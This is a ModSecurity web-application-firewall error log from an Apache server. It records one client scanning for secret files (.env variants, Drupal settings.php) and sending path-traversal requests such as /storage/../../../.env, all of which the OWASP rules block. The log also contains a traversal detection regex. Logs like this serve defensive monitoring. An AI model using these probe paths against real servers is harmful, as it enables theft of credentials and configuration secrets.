[Mon May 11 17:35:43.791719 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWkAAAAQA"]
[Mon May 11 17:35:43.791951 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWkAAAAQA"]
[Mon May 11 17:35:43.796403 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T1V4kyjgo4bQBUhuFAAAAMM"]
[Mon May 11 17:35:43.834988 2026] [core:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 17:35:43.850090 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWkAAAAQA"]
[Mon May 11 17:35:43.868372 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWkwAAAQA"]
[Mon May 11 17:35:43.868568 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWkwAAAQA"]
[Mon May 11 17:35:43.887876 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env~"] [unique_id "agH3T0WKUxpmnkK7zHyWlAAAAQo"]
[Mon May 11 17:35:43.888128 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env~"] [unique_id "agH3T0WKUxpmnkK7zHyWlAAAAQo"]
[Mon May 11 17:35:43.900145 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agH3T1V4kyjgo4bQBUhuFgAAAMM"]
[Mon May 11 17:35:43.900304 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agH3T1V4kyjgo4bQBUhuFgAAAMM"]
[Mon May 11 17:35:43.933266 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWkwAAAQA"]
[Mon May 11 17:35:43.947639 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWlAAAAQo"]
[Mon May 11 17:35:43.948855 2026] [security2:error] [pid 1411099:tid 1411106] [client 195.178.110.155:14496] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3Tw-Qm4vhlWBPlMjSegAAAAU"]
[Mon May 11 17:35:43.948928 2026] [security2:error] [pid 1411099:tid 1411106] [client 195.178.110.155:14496] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3Tw-Qm4vhlWBPlMjSegAAAAU"]
[Mon May 11 17:35:43.949198 2026] [security2:error] [pid 1411099:tid 1411106] [client 195.178.110.155:14496] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3Tw-Qm4vhlWBPlMjSegAAAAU"]
[Mon May 11 17:35:43.951120 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.production"] [unique_id "agH3T0WKUxpmnkK7zHyWlQAAAQA"]
[Mon May 11 17:35:43.951262 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.production"] [unique_id "agH3T0WKUxpmnkK7zHyWlQAAAQA"]
[Mon May 11 17:35:43.964417 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/local/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWlgAAAQo"]
[Mon May 11 17:35:43.964607 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/local/.env"] [unique_id "agH3T0WKUxpmnkK7zHyWlgAAAQo"]
[Mon May 11 17:35:43.972283 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T1V4kyjgo4bQBUhuFgAAAMM"]
[Mon May 11 17:35:43.974350 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3TzJnyuKVXoStDhbOIQAAAFM"]
[Mon May 11 17:35:43.985624 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T_y_GXSWIKeli0sNFQAAAJQ"]
[Mon May 11 17:35:43.990334 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.development"] [unique_id "agH3T1V4kyjgo4bQBUhuFwAAAMM"]
[Mon May 11 17:35:43.990551 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.development"] [unique_id "agH3T1V4kyjgo4bQBUhuFwAAAMM"]
[Mon May 11 17:35:43.990598 2026] [security2:error] [pid 1411201:tid 1411254] [client 195.178.110.155:14590] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/sites/default/settings.php"] [unique_id "agH3T_y_GXSWIKeli0sNGQAAAIg"]
[Mon May 11 17:35:43.991459 2026] [security2:error] [pid 1411201:tid 1411254] [client 195.178.110.155:14590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/sites/default/settings.php"] [unique_id "agH3T_y_GXSWIKeli0sNGQAAAIg"]
[Mon May 11 17:35:43.991482 2026] [security2:error] [pid 1411055:tid 1411072] [client 195.178.110.155:14502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWiAAAAQ8"]
[Mon May 11 17:35:43.991847 2026] [security2:error] [pid 1416109:tid 1416154] [client 195.178.110.155:14522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T1V4kyjgo4bQBUhuEAAAANg"]
[Mon May 11 17:35:43.995180 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3Tw-Qm4vhlWBPlMjSeAAAAAw"]
[Mon May 11 17:35:43.999918 2026] [security2:error] [pid 1412074:tid 1412087] [client 195.178.110.155:14518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3TzJnyuKVXoStDhbOIwAAAEs"]
[Mon May 11 17:35:44.003194 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.local"] [unique_id "agH3UPy_GXSWIKeli0sNGgAAAJQ"]
[Mon May 11 17:35:44.003380 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.local"] [unique_id "agH3UPy_GXSWIKeli0sNGgAAAJQ"]
[Mon May 11 17:35:44.005794 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/config/.env"] [unique_id "agH3UDJnyuKVXoStDhbOJAAAAFM"]
[Mon May 11 17:35:44.005940 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/config/.env"] [unique_id "agH3UDJnyuKVXoStDhbOJAAAAFM"]
[Mon May 11 17:35:44.008888 2026] [security2:error] [pid 1412074:tid 1412080] [client 195.178.110.155:14536] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/storage/.env"] [unique_id "agH3UDJnyuKVXoStDhbOJQAAAEQ"]
[Mon May 11 17:35:44.008139 2026] [security2:error] [pid 1411099:tid 1411114] [client 195.178.110.155:14452] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.bak"] [unique_id "agH3UA-Qm4vhlWBPlMjSewAAAA4"]
[Mon May 11 17:35:44.009399 2026] [security2:error] [pid 1412074:tid 1412080] [client 195.178.110.155:14536] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/storage/.env"] [unique_id "agH3UDJnyuKVXoStDhbOJQAAAEQ"]
[Mon May 11 17:35:44.009523 2026] [security2:error] [pid 1411099:tid 1411114] [client 195.178.110.155:14452] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.bak"] [unique_id "agH3UA-Qm4vhlWBPlMjSewAAAA4"]
[Mon May 11 17:35:44.010048 2026] [security2:error] [pid 1411099:tid 1411106] [client 195.178.110.155:14496] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3Tw-Qm4vhlWBPlMjSegAAAAU"]
